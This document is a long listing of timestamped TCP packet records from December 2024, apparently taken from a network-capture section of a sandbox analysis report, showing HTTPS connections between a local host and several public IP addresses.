                                                                                                                                                                                                          Dec 12, 2024 00:29:16.056449890 CET44349790172.67.189.38192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:16.056793928 CET49790443192.168.2.4172.67.189.38
                                                                                                                                                                                                          Dec 12, 2024 00:29:16.056799889 CET44349790172.67.189.38192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:16.100178957 CET49790443192.168.2.4172.67.189.38
                                                                                                                                                                                                          Dec 12, 2024 00:29:16.918677092 CET44349790172.67.189.38192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:16.919462919 CET44349790172.67.189.38192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:16.919538975 CET49790443192.168.2.4172.67.189.38
                                                                                                                                                                                                          Dec 12, 2024 00:29:16.920608997 CET49790443192.168.2.4172.67.189.38
                                                                                                                                                                                                          Dec 12, 2024 00:29:16.920650005 CET44349790172.67.189.38192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:17.093849897 CET49791443192.168.2.4104.21.65.72
                                                                                                                                                                                                          Dec 12, 2024 00:29:17.093888044 CET44349791104.21.65.72192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:17.093957901 CET49791443192.168.2.4104.21.65.72
                                                                                                                                                                                                          Dec 12, 2024 00:29:17.094250917 CET49791443192.168.2.4104.21.65.72
                                                                                                                                                                                                          Dec 12, 2024 00:29:17.094263077 CET44349791104.21.65.72192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:18.350136042 CET44349791104.21.65.72192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:18.350951910 CET49791443192.168.2.4104.21.65.72
                                                                                                                                                                                                          Dec 12, 2024 00:29:18.350975990 CET44349791104.21.65.72192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:18.352097034 CET44349791104.21.65.72192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:18.352183104 CET49791443192.168.2.4104.21.65.72
                                                                                                                                                                                                          Dec 12, 2024 00:29:18.352643967 CET49791443192.168.2.4104.21.65.72
                                                                                                                                                                                                          Dec 12, 2024 00:29:18.352674007 CET49791443192.168.2.4104.21.65.72
                                                                                                                                                                                                          Dec 12, 2024 00:29:18.352715015 CET44349791104.21.65.72192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:18.352751017 CET49791443192.168.2.4104.21.65.72
                                                                                                                                                                                                          Dec 12, 2024 00:29:18.352785110 CET49791443192.168.2.4104.21.65.72
                                                                                                                                                                                                          Dec 12, 2024 00:29:18.353220940 CET49794443192.168.2.4104.21.65.72
                                                                                                                                                                                                          Dec 12, 2024 00:29:18.353311062 CET44349794104.21.65.72192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:18.353406906 CET49794443192.168.2.4104.21.65.72
                                                                                                                                                                                                          Dec 12, 2024 00:29:18.353686094 CET49794443192.168.2.4104.21.65.72
                                                                                                                                                                                                          Dec 12, 2024 00:29:18.353722095 CET44349794104.21.65.72192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:19.615065098 CET44349794104.21.65.72192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:19.615375042 CET49794443192.168.2.4104.21.65.72
                                                                                                                                                                                                          Dec 12, 2024 00:29:19.615434885 CET44349794104.21.65.72192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:19.618968964 CET44349794104.21.65.72192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:19.619093895 CET49794443192.168.2.4104.21.65.72
                                                                                                                                                                                                          Dec 12, 2024 00:29:19.619545937 CET49794443192.168.2.4104.21.65.72
                                                                                                                                                                                                          Dec 12, 2024 00:29:19.619724989 CET44349794104.21.65.72192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:19.619735956 CET49794443192.168.2.4104.21.65.72
                                                                                                                                                                                                          Dec 12, 2024 00:29:19.663347006 CET44349794104.21.65.72192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:19.674002886 CET49794443192.168.2.4104.21.65.72
                                                                                                                                                                                                          Dec 12, 2024 00:29:19.674063921 CET44349794104.21.65.72192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:19.720362902 CET49794443192.168.2.4104.21.65.72
                                                                                                                                                                                                          Dec 12, 2024 00:29:20.502701044 CET44349794104.21.65.72192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:20.502943993 CET44349794104.21.65.72192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:20.503050089 CET49794443192.168.2.4104.21.65.72
                                                                                                                                                                                                          Dec 12, 2024 00:29:20.504198074 CET49794443192.168.2.4104.21.65.72
                                                                                                                                                                                                          Dec 12, 2024 00:29:20.504237890 CET44349794104.21.65.72192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:45.836520910 CET49891443192.168.2.4142.250.181.100
                                                                                                                                                                                                          Dec 12, 2024 00:29:45.836613894 CET44349891142.250.181.100192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:45.836710930 CET49891443192.168.2.4142.250.181.100
                                                                                                                                                                                                          Dec 12, 2024 00:29:45.837225914 CET49891443192.168.2.4142.250.181.100
                                                                                                                                                                                                          Dec 12, 2024 00:29:45.837266922 CET44349891142.250.181.100192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:47.609635115 CET44349891142.250.181.100192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:47.610023022 CET49891443192.168.2.4142.250.181.100
                                                                                                                                                                                                          Dec 12, 2024 00:29:47.610086918 CET44349891142.250.181.100192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:47.610454082 CET44349891142.250.181.100192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:47.610714912 CET49891443192.168.2.4142.250.181.100
                                                                                                                                                                                                          Dec 12, 2024 00:29:47.610774040 CET44349891142.250.181.100192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:47.659574032 CET49891443192.168.2.4142.250.181.100
                                                                                                                                                                                                          Dec 12, 2024 00:29:50.989990950 CET4972480192.168.2.4199.232.214.172
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.109658003 CET8049724199.232.214.172192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.109730959 CET4972480192.168.2.4199.232.214.172
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.184664011 CET49938443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.184730053 CET4434993820.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.184806108 CET49938443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.184958935 CET49938443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.184990883 CET4434993820.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:53.477087021 CET4434993820.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:53.478318930 CET49938443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:53.478377104 CET4434993820.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:53.479978085 CET4434993820.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:53.480043888 CET49938443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:53.481719017 CET49938443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:53.481808901 CET4434993820.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:53.481973886 CET49938443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:53.481990099 CET4434993820.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:53.528075933 CET49938443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.172911882 CET4434993820.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.172979116 CET4434993820.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.173034906 CET49938443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.173062086 CET4434993820.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.173109055 CET49938443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.173118114 CET4434993820.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.190762997 CET4434993820.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.190834999 CET49938443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.190851927 CET4434993820.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.190900087 CET49938443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.204848051 CET4434993820.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.204921961 CET49938443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.213675976 CET4434993820.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.213747978 CET49938443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.378045082 CET4434993820.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.378210068 CET49938443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.389408112 CET4434993820.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.389509916 CET49938443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.389668941 CET49938443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.389750957 CET4434993820.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.390124083 CET4434993820.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.390198946 CET49938443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.390214920 CET49938443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:57.111557007 CET49977443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:57.111646891 CET4434997720.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:57.111745119 CET49977443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:57.112189054 CET49977443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:57.112226009 CET4434997720.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:57.243112087 CET44349891142.250.181.100192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:57.243181944 CET44349891142.250.181.100192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:57.246130943 CET49891443192.168.2.4142.250.181.100
                                                                                                                                                                                                          Dec 12, 2024 00:29:57.317137003 CET49891443192.168.2.4142.250.181.100
                                                                                                                                                                                                          Dec 12, 2024 00:29:57.317226887 CET44349891142.250.181.100192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:58.973745108 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:58.973810911 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:58.973891973 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:58.974087954 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:58.974102974 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.200931072 CET4434997720.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.201227903 CET49977443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.201242924 CET4434997720.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.202692032 CET4434997720.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.202766895 CET49977443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.203068972 CET49977443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.203152895 CET4434997720.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.203244925 CET49977443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.203258038 CET4434997720.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.264516115 CET49977443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.907037020 CET4434997720.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.907098055 CET4434997720.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.907143116 CET49977443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.907161951 CET4434997720.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.907212019 CET49977443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.924141884 CET4434997720.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.924221992 CET49977443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.940078020 CET4434997720.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.940169096 CET49977443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.948487043 CET4434997720.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.948575974 CET49977443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.956909895 CET4434997720.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.956998110 CET49977443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.965151072 CET4434997720.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.965231895 CET49977443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.965256929 CET4434997720.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.965336084 CET49977443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.965349913 CET4434997720.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.965358019 CET49977443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.965378046 CET4434997720.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.965418100 CET49977443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:29:59.965445995 CET49977443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:00.002408028 CET50000443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:00.002425909 CET4435000020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:00.002499104 CET50000443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:00.003858089 CET50000443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:00.003885031 CET4435000020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:01.101892948 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:01.102122068 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:01.102140903 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:01.102417946 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:01.102672100 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:01.102730036 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:01.102849960 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:01.143331051 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:01.793224096 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:01.793442011 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:01.793503046 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:01.801342964 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:01.801573038 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:01.801634073 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:01.801704884 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:01.821060896 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:01.821258068 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:01.829888105 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:01.829976082 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:01.985024929 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:01.985270977 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:01.988761902 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:01.988847971 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.003885984 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.003967047 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.019176960 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.019397020 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.027096033 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.027204990 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.041807890 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.041907072 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.057243109 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.057328939 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.064675093 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.064852953 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.086920977 CET4435000020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.087163925 CET50000443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.087188959 CET4435000020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.087692022 CET4435000020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.088046074 CET50000443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.088129044 CET4435000020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.134162903 CET50000443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.164020061 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.164259911 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.174312115 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.174499989 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.174560070 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.187201977 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.187402964 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.187463999 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.187542915 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.198671103 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.198755980 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.209927082 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.210107088 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.215589046 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.215670109 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.227130890 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.227214098 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.238432884 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.238519907 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.243995905 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.244072914 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.255238056 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.255538940 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.266011000 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.266098976 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.271686077 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.271821976 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.282932043 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.283107042 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.294035912 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.294269085 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.358973980 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.359169960 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.367072105 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.367155075 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.374522924 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.374600887 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.378616095 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.378684998 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.386228085 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.386327982 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.393467903 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.393542051 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.397447109 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.397526979 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.404297113 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.404372931 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.411329985 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.411451101 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.414947033 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.415021896 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.421169043 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.421274900 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.427598953 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.427704096 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.430963039 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.431040049 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.437582970 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.437731028 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.444065094 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.444130898 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.449516058 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.449584007 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.454201937 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.454269886 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.460783958 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.460863113 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.464895964 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.464967966 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.470927954 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.470999956 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.477054119 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.477138996 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.482666969 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.482738972 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.488446951 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.488509893 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.491846085 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.491910934 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.498728991 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.498799086 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.536611080 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.536695004 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.548455000 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.548521996 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.550299883 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.550379038 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.555727005 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.555788994 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.558588028 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.558660030 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.564876080 CET4434999020.38.136.70192.168.2.4
